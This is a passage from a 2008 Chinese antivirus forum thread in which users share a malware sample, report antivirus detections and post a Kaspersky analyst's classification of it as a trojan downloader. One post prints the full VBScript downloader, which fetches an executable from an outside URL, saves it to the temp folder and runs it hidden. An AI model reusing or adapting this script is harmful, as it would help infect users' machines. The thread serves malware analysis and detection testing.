12
返回列表 发新帖
楼主: qianwenxiang
收起左侧

[病毒样本] avast pass

[复制链接]
solcroft
发表于 2008-1-10 20:00:59 | 显示全部楼层
  1. on error resume next
  2. Function DownloadExecute(source, target)
  3. on error resume next
  4. Dim wobj, eobj, sobj, xobj, aobj, eloc, tfold, tfile, binstring, response, i
  5. Set wobj = CreateObject("WScript.Shell")
  6. Set sobj = CreateObject("Scripting.FileSystemObject")
  7. If VarType(xobj) <> vbObject Then Set xobj = CreateObject("MSXML2.XMLHTTP")
  8. If VarType(xobj) <> vbObject Then Set xobj = CreateObject("Microsoft.XMLHTTP")
  9. If sobj.FileExists(eloc) = False Then
  10.    xobj.Open "GET", source, False
  11.    xobj.Send
  12.    response = xobj.ResponseBody
  13.    For i = 1 To LenB(response)
  14.    binstring = binstring & Chr(AscB(MidB(response, i, 1)))
  15.    Next
  16.    
  17.    Set tfold = sobj.GetSpecialFolder(2)
  18.    Set tfile = tfold.CreateTextFile(target)
  19.    tfile.Write binstring
  20.    tfile.Close
  21. End If
  22. wobj.run tfold & Chr(92) & target, 0
  23. End Function
  24. Call DownloadExecute("http://adxrnet.net/xpre.exe", "xpre.exe")
复制代码
Nblock
发表于 2008-1-10 20:33:40 | 显示全部楼层
微点拦截1个广告程序和多个未知木马  cmd ok

[ 本帖最后由 Nblock 于 2008-1-10 20:39 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Graybird
发表于 2008-1-10 20:40:37 | 显示全部楼层

回复 12楼 Nblock 的帖子

Starting the file scan:

Begin scan in 'E:\������.rar'
E:\������.rar
  [0] Archive type: RAR
  --> 17PHOLMES[1].CMT
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
  --> GEBAXYV.DLL
      [DETECTION] Is the Trojan horse TR/Vundo.DVK.2
  --> RASESNET.EXE
      [DETECTION] Is the Trojan horse TR/Vundo.DVK
  --> UGA6P_0001_N122M2210NETINSTALLER.EXE
      [DETECTION] Contains detection pattern of the SPR/Fake.Syscontrol program
  --> WINVSNET.EXE
      [DETECTION] Contains detection pattern of the SPR/Fake.Syscontrol program
  --> MROFINU572.EXE
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING]   The file was ignored!


End of the scan: 2008年1月10日  20:38
Used time: 00:23 min

The scan has been done completely.

      0 Scanning directories
     17 Files were scanned
      6 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     11 Files not concerned
      1 Archives were scanned
      1 Warnings
      0 Notes
冷冷
发表于 2008-1-10 20:46:29 | 显示全部楼层
要联网了

这两个是干嘛呢?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Graybird
发表于 2008-1-10 21:57:23 | 显示全部楼层
Hello,

xpre.chmk - Trojan-Downloader.Win32.VB.cdq

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Vladimir Krylov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: xpre.rar
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-2 01:17 , Processed in 0.093221 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表